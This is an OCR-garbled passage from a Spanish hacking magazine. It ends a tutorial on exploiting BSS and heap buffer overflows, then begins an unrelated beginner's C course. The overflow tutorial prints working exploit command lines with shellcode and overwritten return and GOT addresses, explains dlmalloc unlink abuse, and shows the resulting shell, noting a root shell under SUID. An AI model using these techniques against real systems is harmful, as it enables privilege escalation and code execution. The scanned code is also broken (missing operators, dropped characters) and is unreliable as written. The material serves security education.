Aqu podemos ver que el programa fun
de nuestro buffer mediante el gdb:(ver
ciona como deseamos. Ahora vamos a
listado 3)
38
tuxed@athenea:~/articulo2$ ./bss2 baja "`perl -e 'print "\x90"x14'``cat scode``perl -e 'print "\x20\x98\x04\x08"'`"

sh-3.00$
Listado 4
tuxed@athenea:~/articulo2$ ./bss2 baja "`cat scode``perl -e 'print "A"x14 ."\x20\x98\x04\x08"'`"
sh-3.00$
Listado 5
Apuntamos la direccin, y procedemos a
rellenar el buffer. Puesto que tenemos 52
bytes para shellcode y NOPs, vamos a
contar los caracteres de nuestra shellco
de, y rellenaremos el resto con NOPs.
Justo despus incluiremos la direccin de
retorno, que es la que acabamos de obte
ner. Antes de verlo, hay que prestar
atencin a un pequeo detalle: La
direccin de la variable devuelta por el
gdb no tiene 4 bytes (8 caracteres). Para
que sean los 8 bytes, nos falta escribir un
0 a la izquierda del 8, pues sino nuestro
ataque no tendr efecto. Ahora s, vamos
a probarlo:(ver listado 4)
C o m o p u e d e s v e r, f u n c i o n a a l a
perfeccin. Adems, podamos haber
quitado los NOPs, pues en este caso la
direccin de las variables no vara como
las de la pila. En realidad s puede va
riar de un programa compilado en un
sistema a otro, pero va a estar muy
cerca. Si estamos explotando un fallo
en local, en un sistema donde tenemos
una cuenta shell, no hay problema para
adivinar la direccin exacta del buffer
(es lo que hemos hecho) y usarlo para
la shellcode sin poner ninguna
instruccin NOP:(ver listado 5)
Como puedes ver, ha funcionado perfec
tamente, aunque esta vez hemos relle
nado el buffer, por detrs de la shellco
de, con letras A. Sin embargo esto no
es posible hacerlo en remoto. En tal ca
so, deberamos averiguar la direccin de
las variables a prueba y error, variando
la direccin de una variable local aloja
da en el mismo segmento de datos, me
diante un offset (desplazamiento) hasta
acertar en la direccin de la variable re
mota.
Los mtodos explicados hasta ahora son
prcticamente independientes de la pla
taforma utilizada. Siempre que poda
mos sobrescribir algn nombre de fiche
ro en un programa con suficientes privi

legios, podremos alterar ficheros impor
tantes de nuestro sistema, para poner
la informacin que creamos oportuna.
Siempre que podamos modificar punte
ros a funciones, podremos ejecutar el
cdigo que queramos, siempre que lo
tengamos convenientemente almacena
do y localizado.
Llegados a este punto, ya hemos acaba
do con lo que tena pensado contaros
acerca de la explotacin de este tipo de
fallos mediante la alteracin de varia
bles importantes de los programas ata
cados. Sin embargo, recordars que al
principio habl de la posibilidad de so
brescribir informacin de mantenimien
to almacenada por malloc() en el Heap.
En la siguiente seccin vamos a hablar
de ello ;-)
En esta ltima parte del artculo, vamos

a hablar sobre la implementacin de la
memoria dinmica presente en el siste
ma operativo GNU/Linux, as como en el
sistema GNU/Hurd. Se trata de la
implementacin de malloc() incluida en
las libreras glibc, llamada Doug Lea's
Malloc Implementation. A partir de aho
ra cualquier referencia a malloc() ser
exclusivamente sobre la implementacin mencionada.
Para poder aprovecharnos de alguna
manera del sistema utilizado por ma
lloc() para ejecutar un cdigo cualquie
ra, primero deberemos entender cmo
funciona este sistema, para ver qu po
demos hacer con l. Sin embargo, no
voy a entrar en demasiados detalles,
puesto que la cosa se puede alargar y
complicar demasiado si nos ponemos a
mirar el cdigo fuente. Si se quiere pro
fundizar ms, se pueden leer los artcu

los de Phrack que pongo como referen
cias al final.
Dijimos al principio que cuando reserva
mos memoria dinmica mediante malloc,
sta se reserva en el segmento llamado
Heap. Adems, comentamos que junto a
la memoria en s, se inclua cierta
informacin de mantenimiento. En reali
dad, malloc maneja unas estructuras de
datos llamadas chunk (de bloque, en in
gls), con el siguiente aspecto:
El entero size guarda el tamao del

chunk actual. Adems, debemos tener
en cuenta que, debido a la forma en
que malloc reserva memoria (redon
deando la cantidad de bytes hacia arri
ba), los tres ltimos bits de este entero
deberan ser siempre nulos. Sin embar
go, lo que se hace es aprovechar estos
tres ltimos bits para otros usos. As, el
ltimo bit del entero size (se le llama
PREV INUSE) nos indica si el chunk an
terior est siendo usado o no (ponin
dolo a 1 o 0 respectivamente). El se
gundo bit menos significativo tambin
tiene un valor especial, pero nosotros
no vamos a prestarle atencin. El terce
ro permanece sin usar.
En cuanto al entero prev size, tiene una
doble funcin. Por una parte, cuando el
chunk anterior est en uso, este entero
se usa como parte de los datos (aho
rrando as 4 bytes :-) ). Cuando el
chunk anterior es liberado, en este cam
po queda reflejado su tamao.
Como ya habrs adivinado, el puntero
ptr de la imagen es el puntero devuelto
por malloc cuando reservamos memo
ria. As, si logramos desbordar el buffer
reservado dinmicamente, estaremos
sobrescribiendo la informacin interna
del chunk siguiente.
Sin embargo, el esquema anterior slo
es vlido cuando el chunk actual est en
39
uso. Cuando liberemos nuestra memoria

(con free(ptr) ), el chunk cambiar ligera
mente, tomando la siguiente forma:
posible. Durante estas operaciones de

unin de dos chunks, se elimina el
chunk que se va a fusionar de la lista,
con lo que tenemos que realizar las si
guientes operaciones:
1.- Almacenar en un puntero tem
poral la direccin de los chunks
anterior y siguiente.
2.- Hacer que el puntero siguiente
del chunk anterior, apunte al si
guiente del actual.
Como puedes ver, han aparecido dos

punteros al principio de los viejos datos,
sobrescribiendo sus 8 primeros bytes
( 4 por cada puntero), y se mantienen
inalterados el resto de los datos.Y qu
son esos dos punteros? Cuando libera
mos un chunk, malloc lo aade en una
lista doblemente enlazada, donde man
tiene todos sus chunks libres.
Y... Qu es una lista doblemente enlaza
da? Una lista enlazada es una estructura
dinmica de datos, que mantiene una
coleccin de estructuras, cada una con un
puntero a la siguiente. As, podemos re
correr la lista desde su primer nodo hasta
el final, gracias a ese puntero.
Siguiendo un razonamiento lgico, una
lista doblemente enlazada ser una lista
enlazada, pero con punteros hacia de
lante y hacia detrs. As, podremos re
correr la lista en ambas direcciones. La
siguiente imagen representa una lista
doblemente enlazada:
Espero que se haya comprendido bien el

concepto de las listas doblemente enla
zadas con este dibujito;-) En este ar
tculo no se pretende que se sepa pro
gramar utilizando listas de este tipo,
simplemente aprovecharnos de unas
operaciones que se hacen en ellas, as
que volvamos a lo nuestro.
Cuando hacemos el free(ptr), malloc lo
que hace es incluir nuestro chunk en la
lista enlazada, y ver si puede unirlo con
alguno de los chunks contiguos, para
tener as un chunk del mximo tamao
40
3.- Lo mismo pero a la inversa. El

puntero anterior del chunk si
guiente apunta al chunk anterior
al actual.
Estas operaciones son efectuadas por la
macro unlink(), definida como sigue:
#define unlink(P, BK, FD)

{
BK P >bk;
FD P >fd;
FD >bk BK;
BK >fd FD;
}
Teniendo en cuenta que cuando se lla
ma a unlink(), P es un puntero al chunk
siguiente, y BK y FD son punteros tem
porales, y que adems, el miembro fd
de la estructura est 8 bytes ms hacia
adelante de su inicio (el tamao de dos
enteros: prev size y size) y el miembro
bk 12 bytes, tenemos que se realiza la
siguiente operacin:
1.- En la direccin apuntada por el
miembro FD de P, ms 12 bytes
(bk de esa estructura) se escribe el
contenido del puntero BK.
2.- En la direccin apuntada por
BK, ms 8 bytes (fd de esa estruc
tura) se escribe el puntero FD.
Como ves, hay un movimiento de pun
teros y un par de escrituras de memo
ria. Adems, si nos encontramos ante
un buffer overflow en variables dinmi
cas, sabemos que tenemos la posibili
dad de controlar lo que se escribe en el
chunk siguiente al nuestro, con lo que
podemos controlar los punteros fd y bk.
Puesto que estos punteros influyen en
las escrituras de memoria realizadas por
la macro unlink(), podemos elegir libre
mente una direccin de memoria y es

cribir en ella aquello que queramos,
simplemente cambiando los valores de
fd y bk.
As, imagina que queremos escribir cua
tro letras A en la direccin de memoria
0x01020304. Teniendo en cuenta lo que
he explicado ms arriba, lo que hara
mos sera:
1.- Poner la direccin
0x01020304 12 en el puntero
fd del siguiente chunk
2.- Poner 0x41414141 (las 4 le
tras A) en el puntero bk.
Ahora bien, para conseguir que haga
eso, hay que tener en cuenta que el bit
PREV INUSE (ltimo bit del campo size)
del chunk sobrescrito deber ser cero
(usaremos aqu y en prev size el valor
0xfffffffc, que es -4 y funciona a la
perfeccin). As, una vez se libere la
memoria, se realizarn los procesos de
escritura que dije antes.
Todo esto es muy bonito y tal, pero,
qu podemos hacer para sacar prove
cho? Pues de momento podemos alterar
direcciones de memoria, que no es poco
;-) Con la capacidad de alterar direccio
nes de memoria, podemos hacer lo si
guiente:
Meter una shellcode en el bu
ffer
sobrescribir fd con la direccin
de un puntero a funcin, una
direccin de retorno almacenada,
etc. [dir ret] menos 12 bytes
(debido a lo que ya se ha mencio
nado anteriormente).
sobrescribir bk con la direccin
del buffer. [dir buff]
Asegurarnos de que el bit
PREV INUSE es cero.
As, tras la liberacin de la memoria
usada por el buffer, tendremos que en
algn lugar donde nuestro programa al
macena una direccin a la que va a sal
tar ms adelante [dir ret] se almacena
r la direccin de nuestra shellcode, y
cuando el programa vaya a ejecutar di
cha instruccin, habremos logrado eje
cutar nuestro cdigo.
Imagen 1
Imagen 2
Sin embargo, hemos obviado la segun
da de las operaciones realizada por un
link(). Si recuerdas, en la direccin de
bk ms ocho bytes se almacena el con
tenido del puntero bk. En nuestro caso,
eso ser a partir del octavo byte de
nuestra shellcode, con lo que sta que
dara intil. As pues, lo que tenemos
que hacer es que al principio del buffer
haya una instruccin que le diga que
salte a la posicin 12 (la posicin 8,
ms los 4 bytes del puntero escrito), y
poner a partir de all nuestra shellcode.
Por tanto, el buffer quedara algo as:
(ver imagen 1)
Pero es que adems, hay que tener en
cuenta que probablemente al liberar el
espacio del primer buffer, los 8 primeros
bytes de ste sern sustituidos por los
campos fd y bk correspondientes. As, se
destruira la instruccin de salto de 10
bytes, con lo que no funcionara. Por tan
to, nos quedar aadir 8 bytes ms de
basura al principio, y sumarle 8 al campo
dir buff, quedando el buffer definitivo as:
(ver imagen 2)
Sin embargo, nos queda encontrar lo que
aqu hemos llamado dir ret. Se trata de
encontrar la direccin de alguna de las
funciones del programa. Para ello, tene
mos varias posibilidades. Si en nuestro
programa vulnerable hay algn puntero a
funcin de los mencionados en la parte
anterior del artculo, ste ser un candi
dato evidente para nuestro ataque.
Adems de stos, otra opcin es modifi
car una seccin de los programas de la
que todava no hemos hablado. Se trata
d e l a s e c c i n l l a m a d a G OT ( G l o b a l
Offset Table). En esta seccin, lo que
hay es una tabla con direcciones de me
moria de las funciones que utiliza el
programa. Podemos localizar mediante
la utilidad objdump la direccin de la
funcin free() en nuestro programa vul
nerable, y mediante la tcnica expuesta
cambiar dicha direccin por la de nues
tro buffer.
Para localizar la funcin free en la GOT

del programa ejemplo2.c visto al princi
pio, haremos lo siguiente:
tuxed@athenea:~/articulo2$ objdump -R ejemplo2 | grep free
08049778 R_386_JUMP_SLOT free
As, ya tendremos la direccin de me

moria a sobrescribir, solamente nos
quedara encontrar la direccin del bu
ffer, y rellenarlo convenientemente.
Vamos a ver todo esto que hemos expli
cado de manera prctica mediante el si
guiente programa:
Cdigo heap1.c:
#include <stdio.h>
int main(int argc, char *argv[]){
char *cad1,*cad2,*cad3;
if (argc<3){
printf("Uso: %s destino mensaje\n", argv[0]);
exit(-1);
}
cad1 (char *)malloc(200);
cad2 (char *)malloc(40);
strncpy(cad2,argv[1],39);
cad2[39] '\0';
strcpy(cad1, argv[2]);
/*Aqu mandaramos el mensaje */
printf("El mail fue mandado a %s :-)\n", cad2);
free(cad1);
free(cad2);
}
Supuestamente, este programa lo que

hace es mandar un mensaje (pasado
como segundo argumento) al destino
pasado como primer argumento.
Veamos su funcionamiento:
tuxed@athenea:~/articulo2$ gcc Heap1.c -o Heap1
tuxed@athenea:~/articulo2$ ./Heap1
Uso: ./Heap1 destino mensaje
tuxed@athenea:~/articulo2$ ./Heap1 pepito@jotmeil.com lalla
El mail fue mandado a pepito@jotmeil.com :-)
:~/articulo2$
Parece que s que hace lo que debera,

p e r o c o m o ve m o s , n o h ay n i n g u n a
proteccin contra desbordamientos al
rellenar el buffer cad1, as que podemos
atacar por ah. Pero segn hemos visto
antes, primero debemos obtener la
direccin de la funcin free(), y la
direccin del propio buffer cad1. Pus
vamos all:
tuxed@athenea:~/articulo2$ objdump -R Heap1 | grep free
080497dc R_386_JUMP_SLOT free
Le restamos 12 y nos queda

0x080497d0.
Ahora vamos a obtener la direccin del
buffer pero esta vez no lo haremos con
gdb, sino con la herramienta ltrace. As,
ejecutamos el siguiente comando:
ltrace ./Heap1 aaa bbb 2>&1 | grep malloc
malloc(200)
0x804a008
malloc(40)
0x804a0d8
Como vemos, el buffer se encuentra en

la direccin 0x0804a008, y sumndole
los 8 bytes, queda 0x0804a010 (8 +8 =
16 bytes, 10 en hexadecimal).
Provistos con estos datos, debemos
preparar nuestro buffer tal y como he
mos indicado antes. Sin embargo, an
no sabemos como hacer el salto incon
dicional que debe ir al principio de
nuestro buffer. Puesto que no entra en
los objetivos del artculo cmo averi
guarlo, os lo digo yo ;-) El cdigo de
operacin de un salto de 10 caracteres
es: \xeb\x0a.
Adems, nos falta saber cunto espacio
disponemos antes del comienzo del
chunk siguiente, puesto que debemos
poner a partir de all los nuevos datos:
prev size, size, fd y bk. Debemos tener
en cuenta para ello que malloc() suma
4 bytes a esa cantidad ( el tamao total
sera de 8 ms la cantidad de datos, sin
embargo, ya que utilizamos como datos
el campo prev size del chunk siguiente,
solamente sumamos 4). Seguidamente,
lo que se hace es redondear hacia arri
ba al mltiplo de 8 bytes ms prximo.
As, si por ejemplo ponemos malloc(16),
tendremos que despus de sumarle los
4 bytes, quedan 20 bytes. Al redondear
41
Imagen 3
al siguiente mltiplo de 8, quedaran 24
bytes. Si reservamos para un buffer de
200 bytes, se redondear al mltiplo de
8 ms prximo a 204, quedando pues
un chunk de 208 bytes.
Puesto que el chunk es de 208 bytes,
tenemos que para datos hay 204 bytes
( el chunk entero, menos los 8 bytes de
sus campos prev size y size, ms el
tamao del campo prev size del chunk
siguiente). Sin embargo, el campo
prev size del chunk siguiente tambin
debe ser sobrescrito, as que en total
deberemos escribir 200 bytes antes del
valor de prev size deseado.
Ahora s, ya sabemos todos los datos
necesarios, as que ya podemos atacar.
Simplemente vamos a tener que poner
las cosas en orden, quedando el buffer
as:(ver imagen 3)
Ahora bien, nos queda saber el tamao
de la basura. Teniendo en cuenta que
tienen que haber 200 bytes entre el sal
to condicional, el relleno de 10 bytes, la
shellcode y la basura, con un poco de
matemticas simples tenemos:
200 bytes 8 bytes - 2 bytes 10
bytes 38 bytes = 142 bytes
Vamos a probarlo (ten en cuenta que

tanto direcciones de memoria como da
tos deben ir en formato little-endian):
./Heap1 tuxed@devnull AAAAAAAA`printf
"\xeb\x0aSALUDOSHxC"``cat scode``perl
e 'print "B"x142 . "\xfc\xff\xff\xff"x2 .
"\xd0\x97\x04\x08\x10\xa0\x04\x08"'`
El mail fue mandado a tuxed@devnull : )
Pues vaya, no ha funcionado. Por qu?
Pues ha fallado debido a que 0x0A es la
representacin en cdigo ASCII del
carcter NL (New Line). Por tanto, el
programa ha interpretado nuestro buff
er como dos parmetros distintos, y no
se ha desbordado. Para arreglarlo, ten
emos que poner todo el buffer entre
comillas, y ya funcionar:
. / H e a p 1 t u x e d @ d e v n u l l
" A A A A A A A A ` p r i n t f
"\xeb\x0aSALUDOSHxC"``cat scode``perl
e 'print "B"x142 . "\xfc\xff\xff\xff"x2 .
"\xd0\x97\x04\x08\x10\xa0\x04\x08"'`"
El mail fue mandado a # : )
sh 3.00$
Como puedes ver, tenemos nuestra
shell. Si el programa Heap1 tuviese el
bit SUID activo y fuera propiedad de
root, ahora tendramos una graciosa
Tienes conocimientos
avanzados sobre Seguridad
Informtica y/o programacin?
Quieres dar a conocer
pblicamente un Bug, la forma
de explotarlo y/o de defenderse?
empleo@editotrans.com
shell de root :-) Debes tener en cuenta

que las letras A en la lnea de comando
anterior son 8, y la cadena
SALUDOSHxC tiene 10 caracteres, que
es justo la cantidad de relleno que
habamos dicho que tenamos que pon
er.
Hasta aqu llega este segundo artculo
sobre explotacin de vulnerabilidades.
Nos vemos en la prxima revista (si no
pasa nada) con un artculo acerca de las
cadenas de formato (format strings).
Espero que os haya gustado y no haya
resultado demasiado dura la ltima
seccin ;-) . Si tenis alguna duda, no
dudis en pasaros por el foro a com
partirla con nosotros.
Eloi S.G. (a.k.a. TuXeD)
A Bea y a mi familia, por aguantarme
Bibliografa:
Phrack 57-0x08:
h
t
tp://www.phrack.org/phrack/57/p570x08
Phrack 57-0x09:
h
t
tp://www.phrack.org/phrack/57/p570x09
w00w00 on heap overflows:
Hola amigos, algunos me conoceris por los foros de HackxCrack. Otros hasta tendris la suer
te/desgracia de conocerme en persona. Soy Popolous y a travs de una serie de artculos vamos
a ir descubriendo, paso a paso, el mundo del C, ese lenguaje desconocido.
Las razones para aprenderlo, son bastante evidentes. Es un lenguaje muy potente, para gente va
liente y adems nos servir para poder entender mejor el curso que Tuxed est haciendo sobre
desbordamientos y dems "virgueras". No me enrollo ms y pasaremos a la accin.
Debo confesar que no s absolutamente nada de C. Y s,

lo admito abiertamente y hasta me atrevo a mandarlo y
publicarlo en una revista. Por qu lo hago? Bueno, porque
no s vosotros, pero a m siempre que he ledo algo, he
pensado: Anda, que si al final del artculo supiese tanto
como el autor.... Y bueno, hete aqu un buen motivo para
escribir sin saber nada de C: aprender yo y al final del
artculo, todos sabris lo mismo que yo.
Debo decir que como novato total y tras haberme costado
sangre, sudor y lgrimas, voy a usar Linux como soporte
para los programas y el compilador gcc, as que no se
asuste nadie si no hay ventanitas de por medio. Si empe
zamos por lo oscuro, qu mejor que una lnea de comandos,
no?.
Pero para los que me quieran tachar de elitista, tengo que
decir que todos los programas han funcionado sin problemas
en Windows. El cdigo es ANSI C estndar, es decir aceptado
por todos los compiladores decentes de C y adems no
estoy usando ninguna librera que no venga en todos los
compiladores. As que todos los programas pueden editarse
y compilarse en cualquiera de los dos entornos (tanto Linux
como Windows).
Lo primero que me llam la atencin al aprender esto de
C fue la cantidad de conceptos nuevos que lo asaltan a uno
cuando empieza a leer un libro sobre C. Uno empieza a

leer y se da cuenta de que aparece la palabra ANSI, que
parece ser, segn dicen, que fue lo que estandariz las
distintas implementaciones de C que haba en un principio.
Esto, a m que lo que quiero es programar, pues no me
sirvi de mucho que digamos. Primera decepcin y primera
tentacin de usar el libro de calzador...
Pero uno sigue leyendo y como todos los principios son
arduos y duros, por la primera en la frente uno no se
achanta, as que uno lee cosas como estas:
que C es un lenguaje que tiene gracia (hasta ahora
cuando veo un cdigo menos rerme me entran ganas
de todo)
que C es elegante (bueno, no lo he visto en la pasarela
Cibeles que digamos)
que C es potente (ahh, por eso Fernando Alonso no
gana tantas carreras el Schumacher ese lleva C.
Eureka!... si de esta no salgo programador al menos
s asesor de moda y/o Frmula 1)
Ah! Y C incluso es portable. Ahora s que me ha
convencido: poder aprender C mientras estoy de caas
con los amigos o tomando un caf, eso es impagable.
Peeerooooo, vaya por Dios, resulta que portable quiere
decir que el mismo cdigo puede compilarse (pasarse
43
de lenguaje humano a lenguaje de

la computadora) en cualquier mqui
na y/o Sistema Operativo con mni
mos cambios ...
Bromas aparte, esto era un poco para
romper el hielo y perderle el miedo ini
cial a lo desconocido.
Cuando uno est aprendiendo C, apare
cen mil trminos:
que si estructurado, imagino que
porque tiene estructura y usa varia
bles locales (que luego podemos usar
para que exploten los programas,
qu majas, qu locuacidad). Pero ojo,
simplemente estructurado, no la
vayamos a complicar (es que no per
mite definir funciones dentro de fun
ciones, qu le vamos a hacer, no lo
puede tener todo el chico).
que si sus orgenes se deben al
lenguaje B, que seguro deriva a su
vez del A ya vers, espera que siga
leyendo. Ah, no! Me he colado de
listo, ups!, deriva de BCPL (caray,
la prdida de letras debi ser alguna
devaluacin importante, ni los len
guajes de programacin sobreviven
a ellas)
que si empez sobre Unix, que si
unos tales Dennis Ritchie, Brian Ker
nigham y Martin Richards, que si
bostezo porque esto parece una clase
de historia, esperad que ahora voy
por un caf...
Adems, uno creyendo toda la vida que
hay lenguajes de alto nivel y de bajo
nivel, resulta que este, para variar, es
de nivel medio. Me lo explique. Y la
respuesta no poda ser menos, llega unas
pocas lneas ms abajo: combina ele
mentos de lenguajes de alto nivel con
lenguajes de ensamblador. Vamos, de
cajn de madera de pino gallego. Y uno
puede leer que C es poco tipificado
(no, no busquis en el Cdigo Penal si
es delito, que no lo encontraris), lo cual
significa que admite una cierta flexibilidad
a la hora de definir y/o manejar distintos
tipos de datos. Y que adems no es muy
quisquilloso a la hora de realizar opera
ciones con distintos tipos de datos. Va
mos, todo un diplomtico.
Y adems algo que ya llama poderosa
mente la atencin: slo tiene 32 palabras
44
clave, frente a cerca del centenar que

tienen otros lenguajes. Todo un detalle,
si tenemos en cuenta que mi memoria no
es muy buena. Voy teniendo curiosidad
sobre eso que dicen que es potente, gil
y dems ... Mmm, esto requiere que abra
mos un poquito ms los ojos y sigamos
leyendo el libro. No os vayis, soy lento
leyendo pero no tanto :P.
Pues me est gustando esto de leer fjate,

porque resulta que C es para programado
res, y eso pues alimenta mi ego, un poco
alicado por la poca cantidad de conocimien
tos que uno atesora. Lo usan los progra
madores y por tanto, esto nos est diciendo:
Oye, que vale la pena echarle horas.
Menos mal, porque uno es muy selectivo
en donde echa las horas :P.
Ya un poco para terminar con el rollazo
de la introduccin y siguiendo con la
lectura, uno aprende por ejemplo, que
C se pens para que los programas que
se escriben con l sean compilados en
vez de interpretados. Es decir, que se
genera un ejecutable (grosso modo) y
luego somos independientes de la fuente
(texto plano donde est el cdigo inteli
gible por un humano). Si fuese interpre
tado, pues habra que tener siempre el
fuente y es ms lento. O sea que la
rapidez est tambin con nosotros. Bien,
sigue sumando puntos.
Y las bibliotecas. No, no os vayis asus
tados, no se trata de esos sitios que de
estudiantes nos servan slo para eva
dirnos en das de fro y cuando el bar
ms cercano estaba hasta arriba de gente
que era ms rpida que nosotros. No.
Se trata de que en C no hay que currr
selo todo (me sigue gustando, menos
trabajo), sino que hay una serie de fun
ciones ya escritas y que nos sirven para
por ejemplo interactuar con la E/S (por
ejemplo hacer que salga por pantalla un
mensaje o enviar a imprimir algo a la
impresora). Fiu! Os imaginis lo que
sera tener que escribir esto nosotros
mismos? Por Dios, que estamos apren
diendo... Gracias a toda esa gente por
ese trabajo que nos han ahorrado. Ahora
no tenemos que reinventar la rueda, slo
u s a r l a . E s t o m e s i g u e g u s t a n d o.
Una vez que uno se adentra ms en un

lenguaje de programacin, le asaltan
conceptos como el de variable, que no
es ms que un cajn donde guardar
datos. Pero bien, resulta que como en
la vida real, carpinteros hay muchos y
cada uno tiene su modo de trabajar, as
que hay cajones de distintos tipos.
Pero en C slo hay 5 carpinteros bsicos
y crearon 5 cajones (char, int, float,
double y void):
char: aqu slo podemos guardar
cosas de tipo carcter (cualquiera
de los que aparecen en la tabla AS
CII). Por ejemplo: a; b; c; d; e; f;
g...
Nota
En www.google.com puedes buscar tablas
ASCII para ver todos sus elementos. Por ejem
plo en http://www.lookuptables.com/ y en
http://www.abcdatos.com/utiles/ascii.html
tienes unas muestras.
int: Aqu podemos guardar nmeros

enteros con y sin signo. Por ejemplo:
1; -1; 2; -2; 18000; -18000; 5668;
-42...
float: en este cajn podemos guar
dar nmeros con decimales en for
mato de coma flotante tanto positivos
como negativos, por ejemplo: 1,25;
-1,25; 2584,9845
double: La nica diferencia con el
anterior (float) es el tamao del
cajn para guardar dichos nmeros,
el cajn double es mas grande.
void: Este es un cajn especial
y quasi-extravagante, porque sirve
para otras cosas. De momento no lo
abriremos ;-).
En el primer tipo de datos (char) tam
bin, como veremos a lo largo del curso,
podemos guardar valores enteros entre
0 y 255. Pero tranquilos que esto ser
ver ms adelante..
Bien, y dentro de estos cajones tene
mos distintos modelos o estilos (llamado
en C modificadores). Para ello slo

deberemos pedir el cajn correspondiente
anteponiendo el modificador:
el tipo char tambin lo podemos usar

para almacenar enteros en un rango
limitado (cmo mucho hasta 256).
El segundo (unsigned) es para discrimi
nar un poquito ms y para que slo
almacenen nmeros positivos.
signed
unsigned
El tercer y cuarto controlan el tamao

de los cajones: grande en el primer caso
(long) y pequeo en el segundo (short).
long
short
Cuidadn con cmo escribimos las cosas,
que C es muy sensible y distingue entre
signed y SiGnEd, por ejemplo.
Cada uno de estos estilos, dota a nues
tros cajones de diversas caractersticas.
Estas caractersticas nos permiten hacer
ms selectivos y especficos nuestros
cajones, aunque en otros casos, no apor
tar nada nuevo al cajn, as que el
carpintero correspondiente de C nos
mirar as con cara medio extraa, aun
que cumplir con nuestro encargo, que
para eso le pagamos xD.
Vamos al grano, el primero de ellos
(signed) lo que hace es obligar a que
nuestros cajones almacenen tanto
nmeros positivos como negativos, que
en el caso de los nmeros son slo
nmeros positivos y en el caso de los
caracteres... pues bueno, sobre esto
volvemos luego, pero quedaros con que
Los modificadores/indicadores de signo

(signed y unsigned) no pueden usarse
conjuntamente, como es algo obvio, pero
s combinados con los de tamao (long
y short).
Hablando del tamao de las cosas ...
Cuantos bytes ocupar cada uno de los
tipos anteriores?. Mmm, uno es curioso
y dicen los manuales que hay que ase
gurarse en cada compilador para hacer
el cdigo lo ms portable posible... Bien,
pues entonces, veamos en nuestro caso
cmo son los distintos tipos de datos y
cunto ocupan, as vemos ya un progra
mita en C, que no ser el tpico Hola
mundo y que tiene algo ms de utilidad.
No es un clsico, pero a veces uno tiene
que sacrificar lo clsico por lo prctico.
De paso vemos un programa en C. Abrid
vuestro editor favorito (en mi caso vim,
nano o gvim, no soy delicado :P), en
Windows el bloc de notas o similar (cui

dadn porque tiene que guardarse como
texto plano, que luego los caracteres no
imprimibles dan ms de un susto ;-)) y
escribid el siguiente cdigo:(ver listado
1)
Bien, tras el subidn de adrenalina que
experiment al escribir este cdigo en
C, todava me quedaba lo mejor: compi
larlo y ejecutarlo. As que, bueno, tras
leerme el man (que no la revista man
:P) de gcc y preguntar a un buen amigo
si estaba yo en lo cierto o no, compil:
popolous@Ulises Programas C $ gcc
primero.c -o primero
primero.c: En la funcin `main':
primero.c:12: aviso: el tipo de
devolucin de `main' no es ìnt'
Para los usuarios de Windows que utilicis
algn compilador en modo grfico no es
ms que irse al men correspondiente
y darle a Compilar o Compile,
segn el idioma con el que os habis con
el compilador que usis. Si no, mirad en
la ayuda de vuestro compilador en modo
texto y ah os aparecer cmo compilar.
Si todava tenis alguna duda, pasaos
por el foro (que no por el forro :P) y os
ayudaremos gustosos ;-).
/* Programa en C que muestra por pantalla el tamao en bytes de los distintos tipos de datos */
//
Primero
importamos
la
librera
estndar
de
para
poder
mostrar
datos
por
pantalla
#include <stdio.h>
// Empezamos a escribir el programa principal, que empieza en la funcin
// main
// Usamos la funcin printf y el operador unario sizeof()

void main(void)
{
printf("El tamao en memoria del tipo char es %o byte\n", sizeof(char));
printf("El tamao en memoria del tipo int es %o bytes\n", sizeof(int));
printf("El tamao en memoria del tipo int con modificador long es %o bytes\n", sizeof(short int));
printf("El tamao en memoria del tipo int con modificador long es %o bytes\n", sizeof(long int));
printf("El tamao en memoria del tipo float es %o bytes\n", sizeof(float));
printf("El
tamao
en
memoria
del
tipo
double
es
%o
bytes\n",
sizeof
(double));
printf("El tamao en memoria del tipo double con modificador long es %o bytes\n", sizeof(long double));
}
Listado 1
45
Volveremos sobre valores/variables de

retorno ms adelante.
popolous@Ulises Programas C $ ./primero

El tamao en memoria del tipo char es 1 byte
El tamao en memoria del tipo int es 4 bytes
El tamao en memoria del tipo int con modificador long es 2 bytes
El tamao en memoria del tipo int con modificador long es 4 bytes
El tamao en memoria del tipo float es 4 bytes
El tamao en memoria del tipo double es 10 bytes
El tamao en memoria del tipo double con modificador long es 14 bytes
Listado 2
De momento tenemos un aviso, esto ya
veremos por qu es, pero no es nada
malo, no os asustis, simplemente es
que el compilador es bastante informa
tivo. l esperaba que la funcin main
devolviese un entero y se ha encontrado
con void y ha protestado. Pero no pasa
nada, es un aviso. Si fuese un error....,
otro gallo cantara.
Bien, el cdigo se llama primero.c y con
el compilador gcc hemos creado el eje
cutable primero. Para ejecutarlo pone
mos:(ver listado 2)
Y aqu estn los resultados en mi orde
nador. Obviamente no tiene por qu
coincidir con los que obtengis cada uno
en los vuestros, suele depender del com
pilador, pero si no obtenis lo mismo,
no os asustis. De aqu, se sacan cosas
interesantes. Como que un tipo int es
por defecto igual que un float, slo que
obviamente, representan cosas distintas.
Y uno sale de dudas con el tamao de
los tipos de datos.
Ahora bien, vamos a explicar algo de
este nuestro primer programa en C. Los
comentarios, como habis podido deducir,
se pueden hacer de dos maneras:
1. Mediante /* para indicar el inicio
de un comentario y */ para finalizarlo.
Se suelen utilizar para cuando los
comentarios ocupan ms de una lnea.
2. Mediante // si ocupa slo una lnea.
Cuando pasamos a la siguiente ya no
tiene efecto.
Los comentarios aaden claridad a un
programa y no hacen que disminuya su
eficiencia como tal, ya que son ignorados
luego por el compilador. Cuantos ms y
46
ms claros, mejor para luego depurar

errores y entender programas no escritos
por nosotros y hacernos entender, claro.
Despus aparece main(). Esta es una
funcin y debe aparecer siempre en todo
programa de C. Es digamos el punto de
entrada. La puerta de acceso para colocar
cajones y dems ;-). Y antes vemos que
tiene la palabra void que como dijimos
era el quinto tipo de datos que hay en
C. Antes de explicar el void (que se
puede traducir por vaco, nada o
hueco), vamos a ver qu es eso de
una funcin.
De matemticas nos han explicado que
una funcin es algo que t le das valores
a una variable (o a varias) y como resul
tado tienes un nmero (u otras cosas
pero no es momento de complicar las
funciones matemticas, de eso se encar
gan ya bien ellas mismas). Bien, pues
este smil expresa muy bien lo que es
una funcin en programacin: recibe
valores de variables (que son tambin
variables, pero que los programadores
se empean en llamar argumentos) y
como resultado arrojan otro valor, que
en el caso de la programacin es otra
variable. En matemticas esto que sera
F(x1,x2,...,xn) = resultado, aqu sera:
tipo_valor_retorno nombre_funcion( x1,x2,...,xn)
{ Bloque de cdigo }
Y esto nos vale como prototipo de
funcin, para poder analizar el resto de
funciones que nos vayamos encontrando
despus.
Luego en nuestro ejemplo se devuelve
una variable que tiene el tipo void (o lo
que es lo mismo, no devuelve nada) y
